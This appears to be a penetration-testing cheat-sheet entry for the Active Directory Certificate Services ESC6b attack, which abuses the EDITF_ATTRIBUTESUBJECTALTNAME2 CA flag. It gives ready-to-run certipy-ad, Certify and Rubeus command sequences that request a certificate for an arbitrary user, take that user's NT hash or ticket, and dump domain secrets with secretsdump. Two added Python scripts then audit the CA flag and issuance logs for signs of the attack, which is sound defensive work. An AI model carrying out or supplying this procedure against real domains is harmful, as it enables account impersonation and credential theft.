ADCSESC6b
ESC6b: EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled on the CA, with weak or no strong certificate mapping → enroll in any Client Authentication template and specify an arbitrary UPN in the SAN to impersonate any user; no SID extension is needed because the DC still maps the certificate by UPN.
Applies to: Users/Computers with Enroll rights on any Client Authentication template → Enterprise CA with EDITF_ATTRIBUTESUBJECTALTNAME2 set (strong certificate mapping not enforced or disabled)
Linux Abuse
certipy-ad
# Step 1: Confirm CA flag and find usable templates
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Step 2: Request cert with arbitrary UPN (no SID required; weak mapping)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-ca '<ca>' -target <ca-host> -template '<template>' \
-upn <target-user>@<domain>
# Output: <target-user>.pfx
# Step 3: Authenticate → get NT hash
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>
# Step 4: PTH / secretsdump
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'
Windows Abuse
Certify.exe + Rubeus
# Step 1: Find CA with EDITF_ATTRIBUTESUBJECTALTNAME2
Certify.exe find /vulnerable
# Step 2: Request cert with arbitrary UPN
Certify.exe request /ca:<ca-host>\<ca> /template:<template> /upn:<target-user>@<domain>
# Step 3: TGT
Rubeus.exe asktgt /user:<target-user> /domain:<domain> \
/certificate:<pfx-base64> /ptt
# Verify
klist
Verify CA flag (certutil)
certutil.exe -config "<ca-host>\<ca>" -getreg "policy\EditFlags"
# EDITF_ATTRIBUTESUBJECTALTNAME2 is the 0x00040000 bit of EditFlags; certutil lists it by name under the value when it is set
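To turn the certutil check above into something repeatable, the following added example (my code, not the page's, Certipy's or Certify's) decodes the EditFlags value that `certutil -getreg policy\EditFlags` prints and combines it with the DCs' strong-mapping setting to give an ESC6b verdict. The sample certutil output is constructed to mimic certutil's layout with a placeholder CA name; the `strong_binding_enforcement` argument is assumed to be the DCs' KB5014754 `StrongCertificateBindingEnforcement` registry value (0 disabled, 1 compatibility, 2 full enforcement).

```python
"""Added example, not code from the page or from Certipy/Certify: decode the
EditFlags DWORD printed by `certutil -config "<ca-host>\\<ca>" -getreg
"policy\\EditFlags"` and judge ESC6b exposure from the defender's side."""
import re

# EDITF_* bit values from Microsoft's certsrv definitions (subset).
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000
EDITF_BITS = {
    0x00000002: "EDITF_REQUESTEXTENSIONLIST",
    0x00000004: "EDITF_DISABLEEXTENSIONLIST",
    0x00000008: "EDITF_ADDOLDKEYUSAGE",
    0x00000040: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x00000100: "EDITF_ENABLEAKIKEYID",
    0x00010000: "EDITF_ENABLEDEFAULTSMIME",
    0x00040000: "EDITF_ATTRIBUTESUBJECTALTNAME2",
    0x00100000: "EDITF_ENABLECHASECLIENTDC",
}

# Constructed sample shaped like certutil's -getreg output. "corp-CA" is a
# placeholder; the flag list is what a CA with the SAN flag on would print.
SAMPLE_CERTUTIL_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\corp-CA\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""

_EDITFLAGS_RE = re.compile(r"EditFlags\s+REG_DWORD\s*=\s*([0-9A-Fa-f]+)")


def parse_edit_flags(certutil_output: str) -> int:
    """Return the EditFlags DWORD (certutil prints it in hex) or raise."""
    m = _EDITFLAGS_RE.search(certutil_output)
    if not m:
        raise ValueError("no 'EditFlags REG_DWORD = ...' line in certutil output")
    return int(m.group(1), 16)


def decode_edit_flags(value: int) -> list:
    """Name every set bit; bits outside the subset above are reported as hex."""
    names = []
    for bit in range(32):
        mask = 1 << bit
        if value & mask:
            names.append(EDITF_BITS.get(mask, f"UNKNOWN_0x{mask:08x}"))
    return names


def has_san_flag(value: int) -> bool:
    """True when EDITF_ATTRIBUTESUBJECTALTNAME2 (bit 0x40000) is set."""
    return bool(value & EDITF_ATTRIBUTESUBJECTALTNAME2)


def esc6b_exposure(edit_flags: int, strong_binding_enforcement: int) -> dict:
    """ESC6b needs the CA flag AND certificate mapping that still accepts a
    certificate carrying no SID extension. With StrongCertificateBindingEnforcement
    (assumed KB5014754 value: 0 disabled, 1 compatibility, 2 full enforcement)
    only full enforcement closes the path; compatibility mode still authenticates."""
    san_flag = has_san_flag(edit_flags)
    return {
        "san_flag_set": san_flag,
        "strong_binding_enforcement": strong_binding_enforcement,
        "exposed": san_flag and strong_binding_enforcement != 2,
    }


if __name__ == "__main__":
    flags = parse_edit_flags(SAMPLE_CERTUTIL_OUTPUT)
    print(f"EditFlags = 0x{flags:08x}: {', '.join(decode_edit_flags(flags))}")
    for mode in (0, 1, 2):
        print(f"enforcement={mode}: {esc6b_exposure(flags, mode)}")
```

Feed it the real certutil output (or the raw DWORD from the registry) and the DCs' enforcement value; the verdict is "exposed" only when both conditions hold, which is the distinction between ESC6b and ESC6a that the page draws. Clearing the flag (`certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2` followed by a CertSvc restart) removes the CA side of the condition regardless of mapping mode.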
Opsec
- Simpler than ESC6a: no SID embedding needed; works against unpatched or misconfigured DCs.
- CA retains all issued certificates; requesting principal is logged alongside the spoofed UPN.
- The CA flag EDITF_ATTRIBUTESUBJECTALTNAME2 is a well-known indicator; defenders check with certutil -getreg.
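The second Opsec point (the requesting principal is logged next to the spoofed UPN) is the detection hook. The added example below (my code, not the page's, Certipy's or Certify's) audits CA issuance events for a request-attribute SAN whose UPN names someone other than the requester, which is exactly the shape of an ESC6b request: the flag only does anything when the SAN arrives as a request attribute, and that attribute is what the CA records. The event records are constructed; their field names follow the Windows Event ID 4887 ("Certificate Services approved a certificate request and issued a certificate") fields Request ID, Requester, Attributes and Subject, and the `san:upn=...&dns=...` attribute syntax is certreq's.

```python
"""Added example, not code from the page or from Certipy/Certify: flag CA
issuance events (Event ID 4887) where a SAN passed as a request attribute
names an account other than the requester."""

# Constructed sample events; domain, users and hosts are placeholders.
SAMPLE_4887_EVENTS = [
    {"RequestId": 1, "Requester": "CORP\\alice",
     "Attributes": "CertificateTemplate:User\nSAN:upn=administrator@corp.local",
     "Subject": "CN=alice,CN=Users,DC=corp,DC=local"},
    {"RequestId": 2, "Requester": "CORP\\bob",
     "Attributes": "CertificateTemplate:User",
     "Subject": "CN=bob,CN=Users,DC=corp,DC=local"},
    {"RequestId": 3, "Requester": "CORP\\carol",
     "Attributes": "CertificateTemplate:User\nsan:upn=carol@corp.local",
     "Subject": "CN=carol,CN=Users,DC=corp,DC=local"},
    {"RequestId": 4, "Requester": "CORP\\dave",
     "Attributes": "CertificateTemplate:Machine\n"
                   "SAN:dns=srv01.corp.local&upn=svc-backup@corp.local",
     "Subject": "CN=dave,CN=Users,DC=corp,DC=local"},
]


def requester_account(requester: str) -> str:
    """'CORP\\alice' -> 'alice' (lower-cased); a bare name passes through."""
    return requester.rsplit("\\", 1)[-1].lower()


def san_upns_from_attributes(attributes: str) -> list:
    """Return every upn=... component of SAN request attributes.
    Attributes are newline-separated 'key:value' pairs; a SAN value is a
    '&'-separated list such as 'upn=a@b&dns=host'. Keys are case-insensitive."""
    upns = []
    for line in attributes.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "san":
            for component in value.split("&"):
                ctype, csep, cval = component.strip().partition("=")
                if csep and ctype.strip().lower() == "upn":
                    upns.append(cval.strip().lower())
    return upns


def find_san_mismatches(events) -> list:
    """Return (RequestId, Requester, UPN) for each issuance whose request-attribute
    UPN does not belong to the requester. Self-enrollment with a matching UPN
    (event 3 in the sample) is deliberately left alone."""
    hits = []
    for ev in events:
        me = requester_account(ev["Requester"])
        for upn in san_upns_from_attributes(ev.get("Attributes", "")):
            if upn.split("@", 1)[0] != me:
                hits.append((ev["RequestId"], ev["Requester"], upn))
    return hits


if __name__ == "__main__":
    for request_id, requester, upn in find_san_mismatches(SAMPLE_4887_EVENTS):
        print(f"request {request_id}: {requester} obtained a certificate for {upn}")
```

The comparison of the UPN prefix with the requester's sAMAccountName is a heuristic: environments where the two legitimately differ need a lookup against the directory instead, and any hit should be cross-checked against the CA database (certutil -view) before the certificate is revoked. Because the CA keeps the issued certificate and the requester identity together, this check also works retroactively over historical events.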